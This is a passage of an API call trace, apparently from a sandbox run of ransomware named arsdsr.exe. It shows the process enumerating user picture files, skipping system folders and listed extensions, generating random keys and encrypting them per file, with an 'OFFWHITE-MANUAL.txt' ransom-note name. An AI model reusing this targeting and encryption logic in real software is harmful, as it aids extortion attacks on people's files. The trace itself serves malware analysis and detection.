(lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.699] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.699] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x561128*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x561128*, pdwDataLen=0x295d60c*=0x100) returned 1 [0146.699] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d8c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0146.699] SetLastError (dwErrCode=0x0) [0146.699] WriteFile (in: hFile=0xffffffff, lpBuffer=0x561020, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0) returned 0 [0146.700] GetLastError () returned 0x6 [0146.700] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae2e79e8, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae2e79e8, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdbb95fd7, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x295d83c, dwReserved1=0xc63907c9, cFileName="usertile15.bmp", cAlternateFileName="")) returned 1 [0146.700] lstrcmpiW (lpString1="usertile15.bmp", lpString2=".") returned 1 [0146.700] lstrcmpiW (lpString1="usertile15.bmp", lpString2="..") returned 1 [0146.700] lstrcmpiW (lpString1="usertile15.bmp", lpString2="...") returned 1 [0146.700] lstrcmpiW (lpString1="usertile15.bmp", lpString2="windows") returned -1 [0146.700] lstrcmpiW (lpString1="usertile15.bmp", lpString2="$recycle.bin") returned 1 [0146.700] lstrcmpiW (lpString1="usertile15.bmp", lpString2="rsa") returned 1 [0146.700] lstrcmpiW (lpString1="usertile15.bmp", lpString2="ntuser.dat") returned 1 [0146.700] lstrcmpiW (lpString1="usertile15.bmp", lpString2="programdata") returned 1 [0146.700] lstrcmpiW (lpString1="usertile15.bmp", lpString2="appdata") returned 1 [0146.700] lstrcmpiW (lpString1="usertile15.bmp", lpString2="program files") returned 1 [0146.700] lstrcmpiW (lpString1="usertile15.bmp", lpString2="program files (x86)") returned 1 [0146.700] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" [0146.700] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile15.bmp" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp" [0146.700] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.700] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.700] PathFindExtensionW (pszPath="usertile15.bmp") returned=".bmp" [0146.700] lstrcmpiW (lpString1=".bmp", lpString2=".exe") returned -1 [0146.700] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0146.700] lstrcmpiW (lpString1=".bmp", lpString2=".cab") returned -1 [0146.700] lstrcmpiW (lpString1=".bmp", lpString2=".cmd") returned -1 [0146.700] lstrcmpiW (lpString1=".bmp", lpString2=".com") returned -1 [0146.700] lstrcmpiW (lpString1=".bmp", lpString2=".cpl") returned -1 [0146.701] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0146.701] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0146.701] lstrcmpiW (lpString1=".bmp", lpString2=".url") returned -1 [0146.701] lstrcmpiW (lpString1=".bmp", lpString2=".ttf") returned -1 [0146.701] lstrcmpiW (lpString1=".bmp", lpString2=".mp3") returned -1 [0146.701] lstrcmpiW (lpString1=".bmp", lpString2=".pif") returned -1 [0146.701] lstrcmpiW (lpString1=".bmp", lpString2=".mp4") returned -1 [0146.701] lstrcmpiW (lpString1=".bmp", lpString2=".OFFWHITE") returned -1 [0146.701] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0146.701] lstrcmpiW (lpString1="usertile15.bmp", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.701] GetProcessHeap () returned 0x500000 [0146.701] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x546ff8 [0146.701] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile15.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.701] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=-4251592508) returned 0 [0146.701] GetProcessHeap () returned 0x500000 [0146.701] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546bd8 [0146.701] GetProcessHeap () returned 0x500000 [0146.701] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546bf0 [0146.701] GetProcessHeap () returned 0x500000 [0146.701] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x561230 [0146.701] GetProcessHeap () returned 0x500000 [0146.701] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x561338 [0146.701] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.701] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.702] SystemFunction036 (in: RandomBuffer=0x546bd8, RandomBufferLength=0x10 | out: RandomBuffer=0x546bd8) returned 1 [0146.702] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.702] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.702] SystemFunction036 (in: RandomBuffer=0x546bf0, RandomBufferLength=0x10 | out: RandomBuffer=0x546bf0) returned 1 [0146.702] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.702] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.702] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x561230*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x561230*, pdwDataLen=0x295d610*=0x100) returned 1 [0146.702] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.702] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.702] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x561338*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x561338*, pdwDataLen=0x295d60c*=0x100) returned 1 [0146.702] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d8c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0146.702] SetLastError (dwErrCode=0x0) [0146.702] WriteFile (in: hFile=0xffffffff, lpBuffer=0x561230, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0) returned 0 [0146.702] GetLastError () returned 0x6 [0146.702] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae30db45, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae30db45, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdca9c9ed, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x295d83c, dwReserved1=0xc63907c9, cFileName="usertile16.bmp", cAlternateFileName="")) returned 1 [0146.702] lstrcmpiW (lpString1="usertile16.bmp", lpString2=".") returned 1 [0146.703] lstrcmpiW (lpString1="usertile16.bmp", lpString2="..") returned 1 [0146.703] lstrcmpiW (lpString1="usertile16.bmp", lpString2="...") returned 1 [0146.703] lstrcmpiW (lpString1="usertile16.bmp", lpString2="windows") returned -1 [0146.703] lstrcmpiW (lpString1="usertile16.bmp", lpString2="$recycle.bin") returned 1 [0146.703] lstrcmpiW (lpString1="usertile16.bmp", lpString2="rsa") returned 1 [0146.703] lstrcmpiW (lpString1="usertile16.bmp", lpString2="ntuser.dat") returned 1 [0146.703] lstrcmpiW (lpString1="usertile16.bmp", lpString2="programdata") returned 1 [0146.703] lstrcmpiW (lpString1="usertile16.bmp", lpString2="appdata") returned 1 [0146.703] lstrcmpiW (lpString1="usertile16.bmp", lpString2="program files") returned 1 [0146.703] lstrcmpiW (lpString1="usertile16.bmp", lpString2="program files (x86)") returned 1 [0146.703] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" [0146.703] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile16.bmp" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp" [0146.703] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.703] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.703] PathFindExtensionW (pszPath="usertile16.bmp") returned=".bmp" [0146.703] lstrcmpiW (lpString1=".bmp", lpString2=".exe") returned -1 [0146.703] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0146.703] lstrcmpiW (lpString1=".bmp", lpString2=".cab") returned -1 [0146.703] lstrcmpiW (lpString1=".bmp", lpString2=".cmd") returned -1 [0146.703] lstrcmpiW (lpString1=".bmp", lpString2=".com") returned -1 [0146.703] lstrcmpiW (lpString1=".bmp", lpString2=".cpl") returned -1 [0146.703] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0146.703] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0146.703] lstrcmpiW (lpString1=".bmp", lpString2=".url") returned -1 [0146.703] lstrcmpiW (lpString1=".bmp", lpString2=".ttf") returned -1 [0146.703] lstrcmpiW (lpString1=".bmp", lpString2=".mp3") returned -1 [0146.703] lstrcmpiW (lpString1=".bmp", lpString2=".pif") returned -1 [0146.703] lstrcmpiW (lpString1=".bmp", lpString2=".mp4") returned -1 [0146.703] lstrcmpiW (lpString1=".bmp", lpString2=".OFFWHITE") returned -1 [0146.703] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0146.703] lstrcmpiW (lpString1="usertile16.bmp", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.703] GetProcessHeap () returned 0x500000 [0146.703] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547008 [0146.704] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile16.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.704] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=-4251592508) returned 0 [0146.704] GetProcessHeap () returned 0x500000 [0146.704] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546c08 [0146.704] GetProcessHeap () returned 0x500000 [0146.704] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546c20 [0146.704] GetProcessHeap () returned 0x500000 [0146.704] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x561440 [0146.704] GetProcessHeap () returned 0x500000 [0146.704] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x561548 [0146.704] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.704] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.704] SystemFunction036 (in: RandomBuffer=0x546c08, RandomBufferLength=0x10 | out: RandomBuffer=0x546c08) returned 1 [0146.704] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.704] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.704] SystemFunction036 (in: RandomBuffer=0x546c20, RandomBufferLength=0x10 | out: RandomBuffer=0x546c20) returned 1 [0146.704] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.704] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.704] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x561440*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x561440*, pdwDataLen=0x295d610*=0x100) returned 1 [0146.705] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.705] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.705] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x561548*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x561548*, pdwDataLen=0x295d60c*=0x100) returned 1 [0146.705] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d8c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0146.705] SetLastError (dwErrCode=0x0) [0146.705] WriteFile (in: hFile=0xffffffff, lpBuffer=0x561440, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0) returned 0 [0146.705] GetLastError () returned 0x6 [0146.705] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae333ca2, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae333ca2, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdcc3f8f7, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x295d83c, dwReserved1=0xc63907c9, cFileName="usertile17.bmp", cAlternateFileName="")) returned 1 [0146.705] lstrcmpiW (lpString1="usertile17.bmp", lpString2=".") returned 1 [0146.705] lstrcmpiW (lpString1="usertile17.bmp", lpString2="..") returned 1 [0146.705] lstrcmpiW (lpString1="usertile17.bmp", lpString2="...") returned 1 [0146.705] lstrcmpiW (lpString1="usertile17.bmp", lpString2="windows") returned -1 [0146.705] lstrcmpiW (lpString1="usertile17.bmp", lpString2="$recycle.bin") returned 1 [0146.705] lstrcmpiW (lpString1="usertile17.bmp", lpString2="rsa") returned 1 [0146.705] lstrcmpiW (lpString1="usertile17.bmp", lpString2="ntuser.dat") returned 1 [0146.705] lstrcmpiW (lpString1="usertile17.bmp", lpString2="programdata") returned 1 [0146.705] lstrcmpiW (lpString1="usertile17.bmp", lpString2="appdata") returned 1 [0146.705] lstrcmpiW (lpString1="usertile17.bmp", lpString2="program files") returned 1 [0146.705] lstrcmpiW (lpString1="usertile17.bmp", lpString2="program files (x86)") returned 1 [0146.705] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" [0146.705] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile17.bmp" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp" [0146.706] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.706] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.706] PathFindExtensionW (pszPath="usertile17.bmp") returned=".bmp" [0146.706] lstrcmpiW (lpString1=".bmp", lpString2=".exe") returned -1 [0146.706] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0146.706] lstrcmpiW (lpString1=".bmp", lpString2=".cab") returned -1 [0146.706] lstrcmpiW (lpString1=".bmp", lpString2=".cmd") returned -1 [0146.706] lstrcmpiW (lpString1=".bmp", lpString2=".com") returned -1 [0146.706] lstrcmpiW (lpString1=".bmp", lpString2=".cpl") returned -1 [0146.706] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0146.706] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0146.706] lstrcmpiW (lpString1=".bmp", lpString2=".url") returned -1 [0146.706] lstrcmpiW (lpString1=".bmp", lpString2=".ttf") returned -1 [0146.706] lstrcmpiW (lpString1=".bmp", lpString2=".mp3") returned -1 [0146.706] lstrcmpiW (lpString1=".bmp", lpString2=".pif") returned -1 [0146.706] lstrcmpiW (lpString1=".bmp", lpString2=".mp4") returned -1 [0146.706] lstrcmpiW (lpString1=".bmp", lpString2=".OFFWHITE") returned -1 [0146.706] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0146.706] lstrcmpiW (lpString1="usertile17.bmp", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.706] GetProcessHeap () returned 0x500000 [0146.706] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547018 [0146.706] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile17.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.706] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=-4251592508) returned 0 [0146.706] GetProcessHeap () returned 0x500000 [0146.706] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546c38 [0146.706] GetProcessHeap () returned 0x500000 [0146.707] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546c50 [0146.707] GetProcessHeap () returned 0x500000 [0146.707] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x561650 [0146.707] GetProcessHeap () returned 0x500000 [0146.707] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x561758 [0146.707] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.707] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.707] SystemFunction036 (in: RandomBuffer=0x546c38, RandomBufferLength=0x10 | out: RandomBuffer=0x546c38) returned 1 [0146.707] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.707] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.707] SystemFunction036 (in: RandomBuffer=0x546c50, RandomBufferLength=0x10 | out: RandomBuffer=0x546c50) returned 1 [0146.707] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.707] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.707] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x561650*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x561650*, pdwDataLen=0x295d610*=0x100) returned 1 [0146.707] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.707] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.707] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x561758*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x561758*, pdwDataLen=0x295d60c*=0x100) returned 1 [0146.707] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d8c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0146.707] SetLastError (dwErrCode=0x0) [0146.707] WriteFile (in: hFile=0xffffffff, lpBuffer=0x561650, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0) returned 0 [0146.708] GetLastError () returned 0x6 [0146.708] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae333ca2, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae333ca2, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdcc65a55, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x295d83c, dwReserved1=0xc63907c9, cFileName="usertile18.bmp", cAlternateFileName="")) returned 1 [0146.708] lstrcmpiW (lpString1="usertile18.bmp", lpString2=".") returned 1 [0146.708] lstrcmpiW (lpString1="usertile18.bmp", lpString2="..") returned 1 [0146.708] lstrcmpiW (lpString1="usertile18.bmp", lpString2="...") returned 1 [0146.708] lstrcmpiW (lpString1="usertile18.bmp", lpString2="windows") returned -1 [0146.708] lstrcmpiW (lpString1="usertile18.bmp", lpString2="$recycle.bin") returned 1 [0146.708] lstrcmpiW (lpString1="usertile18.bmp", lpString2="rsa") returned 1 [0146.708] lstrcmpiW (lpString1="usertile18.bmp", lpString2="ntuser.dat") returned 1 [0146.708] lstrcmpiW (lpString1="usertile18.bmp", lpString2="programdata") returned 1 [0146.708] lstrcmpiW (lpString1="usertile18.bmp", lpString2="appdata") returned 1 [0146.708] lstrcmpiW (lpString1="usertile18.bmp", lpString2="program files") returned 1 [0146.708] lstrcmpiW (lpString1="usertile18.bmp", lpString2="program files (x86)") returned 1 [0146.708] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" [0146.708] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile18.bmp" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp" [0146.708] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.708] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.708] PathFindExtensionW (pszPath="usertile18.bmp") returned=".bmp" [0146.708] lstrcmpiW (lpString1=".bmp", lpString2=".exe") returned -1 [0146.708] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0146.708] lstrcmpiW (lpString1=".bmp", lpString2=".cab") returned -1 [0146.708] lstrcmpiW (lpString1=".bmp", lpString2=".cmd") returned -1 [0146.708] lstrcmpiW (lpString1=".bmp", lpString2=".com") returned -1 [0146.708] lstrcmpiW (lpString1=".bmp", lpString2=".cpl") returned -1 [0146.708] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0146.708] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0146.708] lstrcmpiW (lpString1=".bmp", lpString2=".url") returned -1 [0146.708] lstrcmpiW (lpString1=".bmp", lpString2=".ttf") returned -1 [0146.708] lstrcmpiW (lpString1=".bmp", lpString2=".mp3") returned -1 [0146.708] lstrcmpiW (lpString1=".bmp", lpString2=".pif") returned -1 [0146.708] lstrcmpiW (lpString1=".bmp", lpString2=".mp4") returned -1 [0146.708] lstrcmpiW (lpString1=".bmp", lpString2=".OFFWHITE") returned -1 [0146.708] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0146.708] lstrcmpiW (lpString1="usertile18.bmp", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.709] GetProcessHeap () returned 0x500000 [0146.709] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547028 [0146.709] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile18.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.712] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=-4251592508) returned 0 [0146.712] GetProcessHeap () returned 0x500000 [0146.712] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546c68 [0146.712] GetProcessHeap () returned 0x500000 [0146.712] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546c80 [0146.712] GetProcessHeap () returned 0x500000 [0146.712] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x561860 [0146.712] GetProcessHeap () returned 0x500000 [0146.712] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x561968 [0146.712] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.712] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.712] SystemFunction036 (in: RandomBuffer=0x546c68, RandomBufferLength=0x10 | out: RandomBuffer=0x546c68) returned 1 [0146.712] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.712] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.712] SystemFunction036 (in: RandomBuffer=0x546c80, RandomBufferLength=0x10 | out: RandomBuffer=0x546c80) returned 1 [0146.712] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.712] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.712] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x561860*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x561860*, pdwDataLen=0x295d610*=0x100) returned 1 [0146.713] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.713] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.713] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x561968*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x561968*, pdwDataLen=0x295d60c*=0x100) returned 1 [0146.713] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d8c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0146.713] SetLastError (dwErrCode=0x0) [0146.713] WriteFile (in: hFile=0xffffffff, lpBuffer=0x561860, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0) returned 0 [0146.713] GetLastError () returned 0x6 [0146.713] FindNextFileW (in: hFindFile=0x544590, 